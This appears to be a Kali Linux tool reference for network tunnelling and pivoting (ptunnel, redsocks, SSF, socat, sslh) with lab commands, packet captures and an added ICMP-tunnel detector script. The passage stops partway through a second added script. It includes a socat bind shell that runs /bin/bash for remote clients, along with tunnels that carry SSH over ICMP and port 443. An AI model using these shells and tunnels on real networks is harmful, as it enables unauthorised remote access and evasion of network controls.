[inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
[inf]: Forwarding incoming ping packets over TCP.
[inf]: Ping proxy is listening in privileged mode.
# Start the ptunnel client on port 8000 on the client host (connects via the proxy host to a remote host on a different network)
root@kali_1:~# ptunnel -p 192.168.11.4 -lp 8000 -da 192.168.56.3 -dp 22 -c eth0
# From the client host, open an SSH connection to the ptunnel client (the connection reaches the remote host)
root@kali_1:~# ssh hello@localhost -p 8000
Last login: Wed Nov 6 07:34:54 2024 from 192.168.56.2
$ hostname
kali_3
# Capture packets on the proxy host (ICMP traffic between the client host and the proxy host)
root@kali_2:~# tcpdump -n icmp -i eth0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
09:18:45.388405 IP 192.168.11.4 > 192.168.11.3: ICMP echo reply, id 53644, seq 831, length 36
09:18:46.396275 IP 192.168.11.4 > 192.168.11.3: ICMP echo reply, id 53644, seq 832, length 36
09:18:46.409836 IP 192.168.11.3 > 192.168.11.4: ICMP echo request, id 53644, seq 604, length 36
09:18:46.409952 IP 192.168.11.4 > 192.168.11.3: ICMP echo reply, id 53644, seq 604, length 36
[...]
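Note that the first two packets in the capture above are echo replies with no preceding request; the help text explains why (the privileged proxy crafts custom echo replies). As an added example (my code, not ptunnel's or the page's), the script below pairs echo requests with replies in tcpdump ICMP lines and reports replies that answer nothing, plus the echo rate per host pair. The sample lines are the four above plus one ordinary ping; the rate threshold is an assumption.

```python
"""Flag ptunnel-style ICMP tunnelling in tcpdump output.

Added example; not part of the original page or of ptunnel. Two signals are
checked: echo replies without a matching request (a proxy forging replies),
and an unusually high echo packet rate between one pair of hosts.
"""
import re

# tcpdump ICMP summary line, e.g.
#   09:18:46.409836 IP 192.168.11.3 > 192.168.11.4: ICMP echo request, id 53644, seq 604, length 36
ICMP_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP (?P<src>[\d.]+) > (?P<dst>[\d.]+): "
    r"ICMP echo (?P<kind>request|reply), id (?P<id>\d+), seq (?P<seq>\d+), length (?P<len>\d+)$"
)

RATE_WINDOW = 10.0    # seconds (assumed)
RATE_THRESHOLD = 20   # echo packets per window for one host pair (assumed)


def ts_seconds(ts: str) -> float:
    """Convert tcpdump's HH:MM:SS.ffffff into seconds since midnight."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def max_in_window(times, window: float) -> int:
    """Largest number of events inside any `window`-second span (sliding window over sorted times)."""
    best, start = 0, 0
    for end in range(len(times)):
        while times[end] - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def analyze_icmp(lines):
    """Return unsolicited replies, per-pair burst sizes and pairs over the rate threshold."""
    requests = set()   # (requester, responder, id, seq) seen as echo requests
    unsolicited = []   # replies with no matching request earlier in the capture
    times = {}         # unordered host pair -> list of packet timestamps
    for line in lines:
        m = ICMP_RE.match(line.strip())
        if not m:
            continue  # banners, "[...]", non-echo lines
        pair = tuple(sorted((m["src"], m["dst"])))
        times.setdefault(pair, []).append(ts_seconds(m["ts"]))
        ident = (int(m["id"]), int(m["seq"]))
        if m["kind"] == "request":
            requests.add((m["src"], m["dst"]) + ident)
        else:
            # A reply is legitimate only if the request it answers was seen.
            key = (m["dst"], m["src"]) + ident
            if key in requests:
                requests.discard(key)
            else:
                unsolicited.append({"src": m["src"], "dst": m["dst"],
                                    "id": ident[0], "seq": ident[1]})
    bursts = {pair: max_in_window(sorted(ts), RATE_WINDOW) for pair, ts in times.items()}
    rate_alerts = [pair for pair, n in bursts.items() if n >= RATE_THRESHOLD]
    return {"unsolicited": unsolicited, "bursts": bursts, "rate_alerts": rate_alerts}


def is_suspicious(result) -> bool:
    """True when either signal fired."""
    return bool(result["unsolicited"]) or bool(result["rate_alerts"])


# Constructed sample: the four lines from the capture above and one ordinary ping exchange.
SAMPLE_LINES = [
    "09:18:45.388405 IP 192.168.11.4 > 192.168.11.3: ICMP echo reply, id 53644, seq 831, length 36",
    "09:18:46.396275 IP 192.168.11.4 > 192.168.11.3: ICMP echo reply, id 53644, seq 832, length 36",
    "09:18:46.409836 IP 192.168.11.3 > 192.168.11.4: ICMP echo request, id 53644, seq 604, length 36",
    "09:18:46.409952 IP 192.168.11.4 > 192.168.11.3: ICMP echo reply, id 53644, seq 604, length 36",
    "09:18:47.000000 IP 10.0.0.5 > 10.0.0.1: ICMP echo request, id 7, seq 1, length 64",
    "09:18:47.000300 IP 10.0.0.1 > 10.0.0.5: ICMP echo reply, id 7, seq 1, length 64",
]

if __name__ == "__main__":
    res = analyze_icmp(SAMPLE_LINES)
    for u in res["unsolicited"]:
        print(f"unsolicited echo reply {u['src']} -> {u['dst']} id={u['id']} seq={u['seq']}")
    for pair, n in res["bursts"].items():
        print(f"{pair[0]} <-> {pair[1]}: {n} echo packets in a {RATE_WINDOW:.0f}s window")
    print("suspicious" if is_suspicious(res) else "nothing flagged")
```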
# Capture packets on the proxy host (SSH traffic between the proxy host and the remote host)
root@kali_2:~# tcpdump -n tcp -i eth0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
09:21:23.271827 IP 192.168.56.2.45094 > 192.168.56.3.22: Flags [P.], seq 1487091414:1487092350, ack 2746030853, win 501, options [nop,nop,TS val 849236767 ecr 1033646964], length 936
09:21:23.272263 IP 192.168.56.3.22 > 192.168.56.2.45094: Flags [P.], seq 1:793, ack 936, win 501, options [nop,nop,TS val 1033744284 ecr 849236767], length 792
09:21:23.272313 IP 192.168.56.2.45094 > 192.168.56.3.22: Flags [.], ack 793, win 501, options [nop,nop,TS val 849236767 ecr 1033744284], length 0
09:21:23.272391 IP 192.168.56.3.22 > 192.168.56.2.45094: Flags [P.], seq 793:837, ack 936, win 501, options [nop,nop,TS val 1033744285 ecr 849236767], length 44
[...]
redsocks
Redirects TCP connections to a SOCKS or HTTPS proxy.
■ Usage
root@kali:~# redsocks -h
Usage: redsocks [-?hvt] [-c config] [-p pidfile]
-h, -? this message
-v print version
-t test config syntax
-p write pid to pidfile
■ Usage example
# Start the server (default port: 12345)
root@kali_1:~# redsocks -c /etc/redsocks.conf
# Start SSH as a SOCKS server
root@kali_1:~# ssh hello@192.168.11.4 -N -D 1080
# Redirect outbound TCP connections to port 12345 (redsocks) only when they belong to user hello
root@kali_1:~# iptables -t nat -A OUTPUT -p tcp -m owner --uid-owner hello -j REDIRECT --to-ports 12345
# Connect to the external host as root
root@kali_1:~# ncat 192.168.11.4
hello
# Capture while connecting as root
root@kali_1:~# tcpdump -n -i eth0 tcp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
11:57:37.801396 IP 192.168.11.3.49570 > 192.168.11.4.31337: Flags [S], seq 549533602, win 64240, options [mss 1460,sackOK,TS val 1103279732 ecr 0,nop,wscale 7], length 0
11:57:37.801448 IP 192.168.11.4.31337 > 192.168.11.3.49570: Flags [S.], seq 2320360108, ack 549533603, win 65160, options [mss 1460,sackOK,TS val 800949031 ecr 1103279732,nop,wscale 7], length 0
11:57:37.801455 IP 192.168.11.3.49570 > 192.168.11.4.31337: Flags [.], ack 1, win 502, options [nop,nop,TS val 1103279732 ecr 800949031], length 0
11:57:39.662757 IP 192.168.11.3.49570 > 192.168.11.4.31337: Flags [P.], seq 1:7, ack 1, win 502, options [nop,nop,TS val 1103281594 ecr 800949031], length 6
11:57:39.662816 IP 192.168.11.4.31337 > 192.168.11.3.49570: Flags [.], ack 7, win 510, options [nop,nop,TS val 800950893 ecr 1103281594], length 0
# Connect to the external host as user hello
root@kali_1:~# su hello
$ ncat 192.168.11.4
hello
# Capture while connecting as user hello (SSH is used)
root@kali_1:~# tcpdump -n -i eth0 tcp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
11:58:25.571393 IP 192.168.11.3.47568 > 192.168.11.4.22: Flags [P.], seq 957774049:957774141, ack 2882488548, win 501, options [nop,nop,TS val 1103327505 ecr 800866732], length 92
11:58:25.571432 IP 192.168.11.4.22 > 192.168.11.3.47568: Flags [.], ack 92, win 501, options [nop,nop,TS val 800996804 ecr 1103327505], length 0
11:58:25.571682 IP 192.168.11.4.22 > 192.168.11.3.47568: Flags [P.], seq 1:45, ack 92, win 501, options [nop,nop,TS val 800996805 ecr 1103327505], length 44
11:58:25.618931 IP 192.168.11.3.47568 > 192.168.11.4.22: Flags [.], ack 45, win 501, options [nop,nop,TS val 1103327553 ecr 800996805], length 0
11:58:30.039125 IP 192.168.11.3.47568 > 192.168.11.4.22: Flags [P.], seq 92:136, ack 45, win 501, options [nop,nop,TS val 1103331973 ecr 800996805], length 44
11:58:30.088839 IP 192.168.11.4.22 > 192.168.11.3.47568: Flags [.], ack 136, win 501, options [nop,nop,TS val 801001322 ecr 1103331973], length 0
Secure Socket Funneling
Forwards data to a remote host through a TLS tunnel.
■ Usage
# Client
root@kali:~# ssf --help
Usage:
ssf [OPTION...] server_address
-h, --help Show help message
-v, --verbosity arg Verbosity:
critical|error|warning|info|debug|trace (default: info)
-q, --quiet Do not print logs
-c, --config arg Specify configuration file. If not set,
'config.json' is loaded from the current working
directory
-p, --port arg Remote port (default: 8011)
-m, --max-connect-attempts arg
Max unsuccessful connection attempts before
stopping (default: 1)
-t, --reconnect-delay arg Time to wait before attempting to reconnect
(default: 60)
-n, --no-reconnect Do not attempt to reconnect after loosing a
connection
-g, --gateway-ports Enable gateway ports
-S, --status Display microservices status
Services options:
-Y, --remote-shell [bind_address:]port
Enable remote shell service
-F, --remote-socks [bind_address:]port
Enable remote SOCKS service
-R, --remote-tcp-forward [bind_address:]port:remote_host:remote_port
Enable remote TCP port forwarding service
-V, --remote-udp-forward [bind_address:]port:remote_host:remote_port
Enable remote UDP port forwarding service
-X, --shell [bind_address:]port
Enable client shell service
-D, --socks [bind_address:]port
Enable client SOCKS service
-L, --tcp-forward [bind_address:]port:remote_host:remote_port
Enable client TCP port forwarding service
-U, --udp-forward [bind_address:]port:remote_host:remote_port
Enable client UDP port forwarding service
# Server
root@kali:~# ssfd --help
Usage:
ssfd [OPTION...]
-h, --help Show help message
-v, --verbosity arg Verbosity: critical|error|warning|info|debug|trace
(default: info)
-q, --quiet Do not print logs
-c, --config arg Specify configuration file. If not set,
'config.json' is loaded from the current working directory
-p, --port arg Local port (default: 8011)
-R, --relay-only The server will only relay connections
-l, --bind-address arg Server bind address
-g, --gateway-ports Enable gateway ports
-S, --status Display microservices status
# File copy command
root@kali:~# ssfcp --help
Usage:
ssfcp [OPTION...] [host@]source_path [[host@]destination_path]
-h, --help Show help message
-v, --verbosity arg Verbosity: critical|error|warning|info|debug|trace
(default: info)
-q, --quiet Do not print logs
-c, --config arg Specify configuration file. If not set, 'config.json'
is loaded from the current working directory
-p, --port arg Remote port (default: 8011)
Copy options:
-t, --stdin-input Use stdin as input
--resume Attempt to resume operation if the destination
file exists
--check-integrity Check file integrity
-r, --recursive Copy files recursively
--max-transfers arg Max transfers in parallel (default: 1)
■ Usage example
# Start the server on host 1
root@kali_1:~# ssfd -l 0.0.0.0
[...]
[2024-11-11T09:25:07+00:00] [info] [ssfd] listening on <0.0.0.0:8011>
[2024-11-11T09:25:07+00:00] [info] [ssfd] running (Ctrl + C to stop)
# Start the client on host 2
root@kali_2:~# ssf -L 4444:192.168.11.3:4444 192.168.11.3
[...]
[2024-11-11T09:26:08+00:00] [info] [microservice] [stream_listener]: forward TCP connections from <127.0.0.1:4444> to 4444
[2024-11-11T09:26:08+00:00] [info] [client] service <tcp-forward> OK
# Listen on port 4444 on host 1 (server)
root@kali_1:~# ncat -l 4444
# On host 2 (client), connect to localhost port 4444 and send data
root@kali_2:~# ncat 127.0.0.1 4444
hello
# The data is forwarded to port 4444 on host 1 (server)
root@kali_1:~# ncat -l 4444
hello
# When sent directly to port 4444 on host 1, the data stays in plaintext
root@kali_2:~# tcpdump -n -A -i eth0
11:19:04.260249 IP 192.168.11.4.44338 > 192.168.11.3.4444: Flags [P.], seq 380617744:380617750, ack 3075111035, win 502, options [nop,nop,TS val 1768084645 ecr 3584036271], length 6
E..:}#@.@.eq.........2.\.....Jx{....XV.....
ib......hello
# When sent to port 4444 on host 2, the client encrypts the data and sends it to port 8011 on host 1 (the server's default port)
root@kali_2:~# tcpdump -n -A -i eth0
09:34:18.150869 IP 192.168.11.4.52568 > 192.168.11.3.8011: Flags [P.], seq 1367954941:1367955011, ack 1682389761, win 501, options [nop,nop,TS val 1761797961 ecr 3577749154], length 70
E..z..@.@.?.........X.KQ.U.dG;.....X......
i..I.@......A..........Z%.K.....lM.8.......+..!.......$.ks.fz..=_.[.t.
..C...
# The server decrypts the received data and sends it on to port 4444
root@kali_1:~# tcpdump -n -A -i lo
11:27:23.253593 IP 192.168.11.3.35088 > 192.168.11.3.4444: Flags [P.], seq 3523786492:3523786498, ack 361940377, win 512, options [nop,nop,TS val 2256635252 ecr 2256602763], length 6
E..:P=@.@..V...........\............XW.....
...t....hello
# File transfer from client to server
root@kali_2:~# ssfcp /root/hello.txt 192.168.11.3@/root
[...]
[2024-11-11T11:33:08+00:00] [info] [ssfcp] data copied from /root/hello.txt to /root/hello.txt (success)
[2024-11-11T11:33:08+00:00] [info] [ssfcp] copy finished success (1/1 files copied)
Socat
Establishes byte streams between hosts and transfers data over them.
■ Usage
root@kali:~# socat -h
Usage:
socat [options] <bi-address> <bi-address>
options (general command line options):
-V print version and feature information to stdout, and exit
-h|-? print a help text describing command line options and addresses
-hh like -h, plus a list of all common address option names
-hhh like -hh, plus a list of all available address option names
-d[ddd] increase verbosity (use up to 4 times; 2 are recommended)
-d0|1|2|3|4 set verbosity level (0: Errors; 4 all including Debug)
-D analyze file descriptors before loop
--experimental enable experimental features
--statistics output transfer statistics on exit
-ly[facility] log to syslog, using facility (default is daemon)
-lf<logfile> log to file
-ls log to stderr (default if no other log)
-lm[facility] mixed log mode (stderr during initialization, then syslog)
-lp<progname> set the program name used for logging and vars
-lu use microseconds for logging timestamps
-lh add hostname to log messages
-v verbose text dump of data traffic
-x verbose hexadecimal dump of data traffic
-r <file> raw dump of data flowing from left to right
-R <file> raw dump of data flowing from right to left
-b<size_t> set data buffer size (8192)
-s sloppy (continue on error)
-S<sigmask> log these signals, override default
-t<timeout> wait seconds before closing second channel
-T<timeout> total inactivity timeout in seconds
-u unidirectional mode (left to right)
-U unidirectional mode (right to left)
-g do not check option groups
-L <lockfile> try to obtain lock, or fail
-W <lockfile> try to obtain lock, or wait
-0 do not prefer an IP version
-4 prefer IPv4 if version is not explicitly specified
-6 prefer IPv6 if version is not explicitly specified
bi-address: /* is an address that may act both as data sync and source */
<single-address>
<single-address>!!<single-address>
single-address:
<address-head>[,<opts>]
address-head:
ABSTRACT-CLIENT:<filename> groups=FD,SOCKET,RETRY,UNIX
ABSTRACT-CONNECT:<filename> groups=FD,SOCKET,RETRY,UNIX
ABSTRACT-LISTEN:<filename> groups=FD,SOCKET,LISTEN,CHILD,RETRY,UNIX
ABSTRACT-RECV:<filename> groups=FD,SOCKET,RETRY,UNIX
ABSTRACT-RECVFROM:<filename> groups=FD,SOCKET,CHILD,RETRY,UNIX
ABSTRACT-SENDTO:<filename> groups=FD,SOCKET,RETRY,UNIX
ACCEPT-FD:<fdnum> groups=FD,SOCKET,CHILD,RETRY,RANGE,UNIX,IP4,IP6,UDP,TCP
CREATE:<filename> groups=FD,REG,NAMED
DCCP-CONNECT:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4,IP6
DCCP-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP4,IP6
DCCP4-CONNECT:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4
DCCP4-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP4
DCCP6-CONNECT:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP6
DCCP6-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP6
EXEC:<command-line> groups=FD,FIFO,SOCKET,EXEC,FORK,TERMIOS,PTY,PARENT,UNIX
FD:<fdnum> groups=FD,FIFO,CHR,BLK,REG,SOCKET,TERMIOS,UNIX,IP4,IP6,UDP,TCP
GOPEN:<filename> groups=FD,FIFO,CHR,BLK,REG,SOCKET,NAMED,OPEN,TERMIOS,UNIX
INTERFACE:<interface> groups=FD,SOCKET,INTERFACE
IP-DATAGRAM:<host>:<protocol> groups=FD,SOCKET,RANGE,IP4,IP6
IP-RECV:<protocol> groups=FD,SOCKET,RANGE,IP4,IP6
IP-RECVFROM:<protocol> groups=FD,SOCKET,CHILD,RANGE,IP4,IP6
IP-SENDTO:<host>:<protocol> groups=FD,SOCKET,IP4,IP6
IP4-DATAGRAM:<host>:<protocol> groups=FD,SOCKET,RANGE,IP4
IP4-RECV:<protocol> groups=FD,SOCKET,RANGE,IP4
IP4-RECVFROM:<protocol> groups=FD,SOCKET,CHILD,RANGE,IP4
IP4-SENDTO:<host>:<protocol> groups=FD,SOCKET,IP4
IP6-DATAGRAM:<host>:<protocol> groups=FD,SOCKET,RANGE,IP6
IP6-RECV:<protocol> groups=FD,SOCKET,RANGE,IP6
IP6-RECVFROM:<protocol> groups=FD,SOCKET,CHILD,RANGE,IP6
IP6-SENDTO:<host>:<protocol> groups=FD,SOCKET,IP6
OPEN:<filename> groups=FD,FIFO,CHR,BLK,REG,NAMED,OPEN,TERMIOS
OPENSSL:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4,IP6,TCP,OPENSSL
OPENSSL-DTLS-CLIENT:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4,IP6,UDP,OPENSSL
OPENSSL-DTLS-SERVER:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP4,IP6,UDP,OPENSSL
OPENSSL-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP4,IP6,TCP,OPENSSL
PIPE[:<filename>] groups=FD,FIFO,NAMED,OPEN
POSIXMQ-BIDIRECTIONAL:<mqname> groups=FD,NAMED,RETRY
POSIXMQ-READ:<mqname> groups=FD,NAMED,RETRY
POSIXMQ-RECEIVE:<mqname> groups=FD,NAMED,CHILD,RETRY
POSIXMQ-SEND:<mqname> groups=FD,NAMED,CHILD,RETRY
PROXY:<proxy-server>:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4,IP6,TCP,HTTP
PTY groups=FD,NAMED,TERMIOS,PTY
SCTP-CONNECT:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4,IP6
SCTP-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP4,IP6
SCTP4-CONNECT:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4
SCTP4-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP4
SCTP6-CONNECT:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP6
SCTP6-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP6
SHELL:<shell-command> groups=FD,FIFO,SOCKET,EXEC,FORK,SHELL,TERMIOS,PTY,PARENT,UNIX
SOCKET-CONNECT:<domain>:<protocol>:<remote-address> groups=FD,SOCKET,CHILD,RETRY
SOCKET-DATAGRAM:<domain>:<type>:<protocol>:<remote-address> groups=FD,SOCKET,RANGE
SOCKET-LISTEN:<domain>:<protocol>:<local-address> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE
SOCKET-RECV:<domain>:<type>:<protocol>:<local-address> groups=FD,SOCKET,RANGE
SOCKET-RECVFROM:<domain>:<type>:<protocol>:<local-address> groups=FD,SOCKET,CHILD,RANGE
SOCKET-SENDTO:<domain>:<type>:<protocol>:<remote-address> groups=FD,SOCKET
SOCKETPAIR:<filename> groups=FD,SOCKET
SOCKS4:<socks-server>:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4,IP6,TCP,SOCKS
SOCKS4A:<socks-server>:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4,IP6,TCP,SOCKS
SOCKS5-CONNECT:<socks-server>[:<socks-port>]:<target-host>:<target-port> groups=FD,SOCKET,CHILD,RETRY,IP4,IP6,TCP,SOCKS
SOCKS5-LISTEN:<socks-server>[:<socks-port>]:<listen-host>:<listen-port> groups=FD,SOCKET,CHILD,RETRY,IP4,IP6,TCP
STDERR groups=FD,FIFO,CHR,BLK,REG,SOCKET,TERMIOS,UNIX,IP4,IP6,UDP,TCP
STDIN groups=FD,FIFO,CHR,BLK,REG,SOCKET,TERMIOS,UNIX,IP4,IP6,UDP,TCP
STDIO groups=FD,FIFO,CHR,BLK,REG,SOCKET,TERMIOS,UNIX,IP4,IP6,UDP,TCP
STDOUT groups=FD,FIFO,CHR,BLK,REG,SOCKET,TERMIOS,UNIX,IP4,IP6,UDP,TCP
SYSTEM:<shell-command> groups=FD,FIFO,SOCKET,EXEC,FORK,TERMIOS,PTY,PARENT,UNIX
TCP-CONNECT:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4,IP6,TCP
TCP-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP4,IP6,TCP
TCP4-CONNECT:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4,TCP
TCP4-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP4,TCP
TCP6-CONNECT:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP6,TCP
TCP6-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP6,TCP
TUN[:<ip-addr>/<bits>] groups=FD,CHR,OPEN,INTERFACE
UDP-CONNECT:<host>:<port> groups=FD,SOCKET,IP4,IP6,UDP
UDP-DATAGRAM:<host>:<port> groups=FD,SOCKET,RANGE,IP4,IP6,UDP
UDP-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RANGE,IP4,IP6,UDP
UDP-RECV:<port> groups=FD,SOCKET,RANGE,IP4,IP6,UDP
UDP-RECVFROM:<port> groups=FD,SOCKET,CHILD,RANGE,IP4,IP6,UDP
UDP-SENDTO:<host>:<port> groups=FD,SOCKET,IP4,IP6,UDP
UDP4-CONNECT:<host>:<port> groups=FD,SOCKET,IP4,UDP
UDP4-DATAGRAM:<host>:<port> groups=FD,SOCKET,RANGE,IP4,UDP
UDP4-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RANGE,IP4,UDP
UDP4-RECV:<port> groups=FD,SOCKET,RANGE,IP4,UDP
UDP4-RECVFROM:<port> groups=FD,SOCKET,CHILD,RANGE,IP4,UDP
UDP4-SENDTO:<host>:<port> groups=FD,SOCKET,IP4,UDP
UDP6-CONNECT:<host>:<port> groups=FD,SOCKET,IP6,UDP
UDP6-DATAGRAM:<host>:<port> groups=FD,SOCKET,RANGE,IP6,UDP
UDP6-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RANGE,IP6,UDP
UDP6-RECV:<port> groups=FD,SOCKET,RANGE,IP6,UDP
UDP6-RECVFROM:<port> groups=FD,SOCKET,CHILD,RANGE,IP6,UDP
UDP6-SENDTO:<host>:<port> groups=FD,SOCKET,IP6,UDP
UDPLITE-CONNECT:<host>:<port> groups=FD,SOCKET,IP4,IP6,UDP
UDPLITE-DATAGRAM:<host>:<port> groups=FD,SOCKET,RANGE,IP4,IP6,UDP
UDPLITE-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RANGE,IP4,IP6,UDP
UDPLITE-RECV:<port> groups=FD,SOCKET,RANGE,IP4,IP6,UDP
UDPLITE-RECVFROM:<port> groups=FD,SOCKET,CHILD,RANGE,IP4,IP6,UDP
UDPLITE-SENDTO:<host>:<port> groups=FD,SOCKET,IP4,IP6,UDP
UDPLITE4-CONNECT:<host>:<port> groups=FD,SOCKET,IP4,UDP
UDPLITE4-DATAGRAM:<remote-address>:<port> groups=FD,SOCKET,RANGE,IP4,UDP
UDPLITE4-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RANGE,IP4,UDP
UDPLITE4-RECV:<port> groups=FD,SOCKET,RANGE,IP4,UDP
UDPLITE4-RECVFROM:<host>:<port> groups=FD,SOCKET,CHILD,RANGE,IP4,UDP
UDPLITE4-SENDTO:<host>:<port> groups=FD,SOCKET,IP4,UDP
UDPLITE6-CONNECT:<host>:<port> groups=FD,SOCKET,IP6,UDP
UDPLITE6-DATAGRAM:<host>:<port> groups=FD,SOCKET,RANGE,IP6,UDP
UDPLITE6-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RANGE,IP6,UDP
UDPLITE6-RECV:<port> groups=FD,SOCKET,RANGE,IP6,UDP
UDPLITE6-RECVFROM:<port> groups=FD,SOCKET,CHILD,RANGE,IP6,UDP
UDPLITE6-SENDTO:<host>:<port> groups=FD,SOCKET,IP6,UDP
UNIX-CLIENT:<filename> groups=FD,SOCKET,NAMED,RETRY,UNIX
UNIX-CONNECT:<filename> groups=FD,SOCKET,NAMED,RETRY,UNIX
UNIX-LISTEN:<filename> groups=FD,SOCKET,NAMED,LISTEN,CHILD,RETRY,UNIX
UNIX-RECV:<filename> groups=FD,SOCKET,NAMED,RETRY,UNIX
UNIX-RECVFROM:<filename> groups=FD,SOCKET,NAMED,CHILD,RETRY,UNIX
UNIX-SENDTO:<filename> groups=FD,SOCKET,NAMED,RETRY,UNIX
VSOCK-CONNECT:<cid>:<port> groups=FD,SOCKET,CHILD,RETRY
VSOCK-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY
■ Usage example
# Listen for TCP connections on port 80 on host 1 and forward them to example.com
root@kali_1:~# socat TCP4-LISTEN:80,fork TCP4-CONNECT:example.com:80
# When host 2 sends an HTTP request to host 1, it is forwarded to example.com and the response from example.com comes back
root@kali_2:~# curl -H 'Host:example.com' http://192.168.11.3
<!doctype html>
<html>
<head>
<title>Example Domain</title>
[...]
<body>
<div>
<h1>Example Domain</h1>
<p>This domain is for use in illustrative examples in documents. You may use this
domain in literature without prior coordination or asking for permission.</p>
<p><a href="https://www.iana.org/domains/example">More information...</a></p>
</div>
</body>
</html>
# Listen for TCP connections on port 22 on host 1 and forward them to host 3
root@kali_1:~# socat TCP4-LISTEN:22,fork TCP4-CONNECT:192.168.56.2:22
# SSH from host 2 to host 1 (the connection is forwarded and lands on host 3)
root@kali_2:~# ssh -l hello 192.168.11.3
hello@192.168.11.3's password:
┌──(hello㉿kali_3)-[~]
└─$
# Listen for TCP connections on port 4444 on host 1 and execute the commands received
root@kali_1:~# socat TCP4-LISTEN:4444,fork EXEC:"/bin/bash"
# Connect from host 2 to host 1 and run a command
root@kali_2:~# ncat 192.168.11.3 4444
hostname
kali_1
sslh
Forwards traffic accepted on a given port to the corresponding address according to its protocol (HTTP, TLS/SSL, SSH, OpenVPN, tinc, XMPP, SOCKS5, etc.).
■ Usage
root@kali:~# sslh --help
[-Vfin] [-F <file>] [-v <n>] [--transparent] [-t <n>] [-u <str>] [-P <file>] [-C <path>] [--syslog-facility=<str>] [--on-timeout=<str>] [--prefix=<str>] [-p <host:port>]... [--ssh=<host:port>]... [--tls=<host:port>]... [--openvpn=<host:port>]... [--tinc=<host:port>]... [--xmpp=<host:port>]... [--http=<host:port>]... [--adb=<host:port>]... [--socks5=<host:port>]... [--syslog=<host:port>]... [--anyprot=<host:port>]...
-F, --config=<file> Specify configuration file
-v, --verbose=<n>
-V, --version Print version information and exit
-f, --foreground Run in foreground instead of as a daemon
-i, --inetd Run in inetd mode: use stdin/stdout instead of network listen
-n, --numeric Print IP addresses and ports as numbers
--transparent Set up as a transparent proxy
-t, --timeout=<n> Set up timeout before connecting to default target
-u, --user=<str> Username to change to after set-up
-P, --pidfile=<file> Path to file to store PID of current instance
-C, --chroot=<path> Root to change to after set-up
--syslog-facility=<str> Facility to syslog to
--on-timeout=<str> Target to connect to when timing out
--prefix=<str> Reserved for testing
-p, --listen=<host:port> Listen on host:port
--ssh=<host:port> Set up ssh target
--tls=<host:port> Set up TLS/SSL target
--openvpn=<host:port> Set up OpenVPN target
--tinc=<host:port> Set up tinc target
--xmpp=<host:port> Set up XMPP target
--http=<host:port> Set up HTTP (plain) target
--adb=<host:port> Set up ADB (Android Debug) target
--socks5=<host:port> Set up socks5 target
--syslog=<host:port> Set up syslog target
--anyprot=<host:port> Set up default target
■ Usage example
# If an SSH connection arrives on port 443, forward it to port 22
root@kali_1:~# sslh -p 0.0.0.0:443 --ssh 127.0.0.1:22
# SSH in over port 443 and log in
root@kali_2:~# ssh hello@192.168.11.4 -p 443
hello@192.168.11.4's password:
┌──(hello㉿kali_1)-[~]
└─$
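The decision sslh makes on each connection is driven by the first bytes the client sends. The following is an added example, not sslh's own code: it implements that probing for SSH, TLS, HTTP and SOCKS5 using the fingerprints from the respective RFCs, models sslh's timeout behaviour (a client that stays silent is treated as SSH, because SSH clients wait for the server banner), and shows the MSG_PEEK trick that lets a multiplexer inspect the bytes without consuming them. The backend names are assumptions for the demo.

```python
"""How an sslh-style multiplexer decides where to forward a connection.

Added example (not sslh's code): the server peeks at the first bytes a
client sends and picks a backend from them. Protocol fingerprints follow
the RFCs; the backend names are assumptions for this demo.
"""
import re
import socket


def looks_like_ssh(data: bytes) -> bool:
    # RFC 4253: the client identification string starts with "SSH-".
    return data.startswith(b"SSH-")


def looks_like_tls(data: bytes) -> bool:
    # TLS record header: content type 0x16 (handshake), major version 0x03,
    # a 2-byte length, then a handshake message of type 0x01 (ClientHello).
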